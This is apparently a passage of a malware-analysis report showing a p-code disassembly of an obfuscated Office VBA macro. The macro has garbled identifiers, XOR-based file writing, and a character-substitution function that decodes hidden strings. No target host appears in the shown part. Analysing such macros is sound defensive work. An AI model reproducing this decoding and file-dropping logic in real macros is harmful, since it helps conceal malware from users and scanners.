' ArgsLd ¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸¹µ¬¶§¨¼µ®»¶¾ªºº³³¬§°¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸² 0x0001
' Set ¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥
' Line #30:
' Ld ¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥
' ArgsMemCall Open 0x0000
' Line #31:
' Ld «¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´
' Ld ¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥
' MemSt Type
' Line #32:
' Ld ©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ
' Ld ¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥
' ArgsMemCall Xor 0x0001
' Line #33:
' Ld §º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶
' Ld «¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´
' Ld «¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´
' Add
' Ld ¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥
' ArgsMemCall i 0x0002
' Line #34:
' Ld ¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥
' ArgsMemCall Close 0x0000
' Line #35:
' EndIfBlock
' Line #36:
' Ld §º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶
' Paren
' Ld º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥
' ArgsMemCall Open 0x0001
' Line #37:
' EndSub
' Line #38:
' Line #39:
' FuncDefn (Public Function ¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©(²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨, id_FFFE As Variant))
' Line #40:
' LitStr 0x006E " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåض§Ú¥"
' St ¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££
' Line #41:
' LitStr 0x006E " ¿¡@#$%^&*()_+|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNضQR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY"
' St bSpecialPathkjbksd
' Line #42:
' StartForVariable
' Ld Document
' EndForVariable
' LitDI2 0x0001
' Ld ²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨
' FnLen
' For
' Line #43:
' Ld ¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££
' Ld ²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨
' Ld Document
' LitDI2 0x0001
' ArgsLd Mid 0x0003
' FnInStr
' St id_0344
' Line #44:
' Ld id_0344
' LitDI2 0x0000
' Gt
' IfBlock
' Line #45:
' Ld bSpecialPathkjbksd
' Ld id_0344
' LitDI2 0x0001
' ArgsLd Mid 0x0003
' St id_0346
' Line #46:
' Ld id_0348
' Ld id_0346
' Add
' St id_0348
' Line #47:
' ElseBlock
' Line #48:
' Ld id_0348
' Ld ²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨
' Ld Document
' LitDI2 0x0001
' ArgsLd Mid 0x0003
' Add
' St id_0348
' Line #49:
' EndIfBlock
' Line #50:
' StartForVariable
' Next
' Line #51:
' Ld id_0348
' St ¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©
' Line #52:
' EndFunc
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.